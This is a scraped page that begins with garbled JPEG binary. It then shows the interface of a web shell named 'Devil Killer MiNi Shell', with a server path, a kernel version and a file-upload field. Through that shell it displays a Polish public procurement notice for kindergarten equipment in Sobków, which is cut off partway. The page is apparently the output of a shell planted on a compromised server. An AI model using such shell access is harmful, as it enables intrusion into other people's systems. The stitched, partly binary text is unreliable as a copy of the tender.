JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250718/0033491301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i montaż wyposażenia oraz pomocy do prowadzenia zajęć w ramach programu &#34;Aktywny Maluch&#34; 2022-2029 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Obsługi Ekonomiczno-Administracyjnej Oświaty w Sobkowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 290627211</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ŹRÓDŁOWA, 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sobków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-305</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zoeao@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zoeao-sobkow.biuletyn.net/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i montaż wyposażenia oraz pomocy do prowadzenia zajęć w ramach programu &#34;Aktywny Maluch&#34; 2022-2029 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6dec8ca9-09bb-4216-aaac-d7c0b15a9451</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00334913</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041577/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup i montaż wyposażenia oraz pomocy do prowadzenia zajęć w ramach programu &#34;Aktywny Maluch&#34; 2022-2029</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zakup i montaż wyposażenia oraz pomocy do prowadzenia zajęć w ramach programu Aktywny Maluch + 2022-2029 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6dec8ca9-09bb-4216-aaac-d7c0b15a9451 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>1.2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>1.3.	Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): https://ezamowienia.gov.pl/mp-client/search/list/<br/>1.4.	Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>1.5.	Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6dec8ca9-09bb-4216-aaac-d7c0b15a9451<br/>1.6.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>1.7.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>1.8.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>1.10.	Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>1.11.	W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>1.12.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>1.13.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>1.14.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>1.15.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>1.16.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej<br/>„RODO”, informuję, że:<br/>1.1	Administratorem Pani/a danych osobowych jest Zespół Obsługi Ekonomiczno - Administracyjnej Oświaty w Sobkowie z siedzibą przy ulicy ul. Źródłowa 4, 28-305 Sobków. Można się z nami skontaktować listownie lub osobiście w naszej siedzibie, telefonicznie pod numerem telefonu 41 387 10 25 za pomocą korespondencji elektronicznej na adres mailowy: zoeao@op.pl;<br/>1.2	inspektorem ochrony danych osobowych w ZOEAO w Sobkowie jest Pan Mariusz Piskorczyk, kontakt: tel: 665 586 137, e-mail: biuro@opentech.com.pl<br/>1.3 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego,<br/>1.4	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.),<br/>1.5	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 7 lat od dnia zakończenia postępowania o udzielenie zamówienia lub na okres przechowywania tych danych zgodnie z wytycznymi o dofinansowania z środków UE,<br/>1.6	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>1.7	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>1.8	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **,<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***,<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>1.9	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZO.261.4.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Dostawa i montaż sprzętu multimedialnego, RTV i AGD<br/>1	Radioodtwarzacz<br/>2	Lampa bakteriobójcza przepływowa mobilna<br/>3	Generator ozonu<br/>4	Niszczarka wielofunkcyjna<br/>5	Laminator A3<br/>6	Kolorowe urządzenie wielofunkcyjne<br/>7	Smartfon<br/>8	Mysz komputerowa <br/>9	Laptop z systemem operacyjnym<br/>10	Pralka<br/>11	Odkurzacz uniwersalny<br/>12	Parownica<br/>13	Myjka do okien<br/>14	Uchwyt ruchomy na telewizor<br/>15	Telewizor <br/>16	Blender ręczny<br/>17	Monitor interaktywny<br/>18	Sprzęt nagłaśniający przenośny<br/>19	Podłoga interaktywna<br/>20	Lodówka<br/>21	Kuchenka wolnostojąca </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32322000-6 - Urządzenia multimedialne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39700000-9 - Sprzęt gospodarstwa domowego</p> <p class="mb-0">39200000-4 - Wyposażenie domowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) - waga kryterium 60 %;<br/>2)	Termin dostawy (TR) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Cena (C) - waga 60 %<br/>C = cena najniższa brutto*/ cena oferty ocenianej brutto x 100 pkt x 60 %<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	Formuła oceny w kryterium termin dostawy (TD):<br/>	maksymalny termin dostawy wynosi 21 dni – 0 pkt<br/>	za termin dostawy równy 14 dni – 20 pkt.<br/>	za termin dostawy równy 7 dni – 40 pkt.<br/>W kryterium termin dostawy Wykonawca otrzyma maksymalnie 40 pkt.<br/>W przypadku, w którym Wykonawca nie określi oferowanego terminy dostawy Zamawiający uzna, iż oferowany termin dostawy wynosi 21 dni. <br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 Dostawa i montaż wyposażenia technologicznego kuchennego<br/>1	Czajnik z regulacją temperatury<br/>2	Pojemnik na sztućce - 4 częściowy <br/>3	Wkład do pojemnika na sztućce stalowy<br/>4	Szafa przelotowa z drzwiami suwnymi <br/>5	Podstawa do zmywarko wyparzarki uniwersalnej <br/>6	&#34;Zmywarko - wyparzarka, uniwersalna, dozownik płynu myjącego, pompą zrzutową i pompą wspomagającą płukanie&#34;<br/>7	&#34;Stół przyścienny z drzwiami suwnymi&#34;<br/>8	Umywalka zabudowana<br/>9	Stół z basenem jednokomorowym<br/>10	Stół ze zlewem dwukomorowym bez półki<br/>11	Bateria umywalkowa <br/>12	Bateria zlewozmywakowa stojąca<br/>13	Stół centralny bez półki<br/>14	Wózek kelnerski 2-półkowy<br/>15	Dozownik mydła<br/>16	Dozownik do ręczników papierowych<br/>17	Fartuch kuchenny<br/>18	Czapka kuchenna<br/>19	Kosz na śmieci<br/>20	Sitko<br/>21	Chochla<br/>22	Szczypce<br/>23	Termometr sonda<br/>24	Nóż ze stali<br/>25	Nóż do obierania<br/>26	Ostrzałka do noży<br/>27	Deska do krojenia<br/>28	Łyżka stołowa<br/>29	Widelec stołowy<br/>30	Nóż stołowy<br/>31	Łyżeczka do herbaty<br/>32	Talerz deserowy<br/>33	Talerz obiadowy<br/>34	Miska<br/>35	Kubek<br/>36	Dzbanek szklany<br/>37	Pojemnik gastronomiczny <br/>38	Pojemnik gastronomiczny<br/>39	Pojemnik gastronomiczny<br/>40	Pokrywka do pojemnika gastronomicznego<br/>41	Pojemnik gastronomiczny<br/>42	Pokrywka do pojemnika gastronomicznego<br/>43	Pojemnik gastronomiczny z pokrywą<br/>44	Pojemnik gastronomiczny z pokrywą<br/>45	Pojemnik termoizolacyjny<br/>46	Termos do transportowania żywności<br/>47	Termos stołowy<br/>48	Taca<br/>49	Podgrzewacz elektryczny </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39700000-9 - Sprzęt gospodarstwa domowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) - waga kryterium 60 %;<br/>2)	Termin dostawy (TR) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Cena (C) - waga 60 %<br/>C = cena najniższa brutto*/ cena oferty ocenianej brutto x 100 pkt x 60 %<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	Formuła oceny w kryterium termin dostawy (TD):<br/>	maksymalny termin dostawy wynosi 21 dni – 0 pkt<br/>	za termin dostawy równy 14 dni – 20 pkt.<br/>	za termin dostawy równy 7 dni – 40 pkt.<br/>W kryterium termin dostawy Wykonawca otrzyma maksymalnie 40 pkt.<br/>W przypadku, w którym Wykonawca nie określi oferowanego terminy dostawy Zamawiający uzna, iż oferowany termin dostawy wynosi 21 dni. <br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) 